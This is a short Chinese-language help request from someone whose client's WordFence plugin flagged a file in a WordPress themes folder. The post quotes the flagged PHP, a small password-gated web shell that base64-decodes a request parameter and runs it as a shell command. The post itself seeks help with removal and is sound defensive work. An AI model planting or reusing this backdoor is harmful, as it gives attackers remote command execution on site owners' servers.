一个客户要我看一下他的安全插件(WordFence)提醒他的一些“恶意代码”。在/ wp-content / themes文件夹中找到了它。
当搜索PHP代码的一部分时,我得到的可疑结果与github repos和标有“ hacker”的东西以及俄语和其他语言的链接有关。我不太怀疑它是否是恶意软件,但除了删除文件之外,我不知道从哪里可以得到。
$s=explode(":","99ca5f8858b3bd43cf30a4e7dc9417e8b8b53822:year:_cat");$q=$_REQUEST;if (sha1(md5($q[$s[1]]))===$s[0]){if (isset($q[$s[2]])){$l=base64_decode($q[$s[2]]);echo `$l`;}}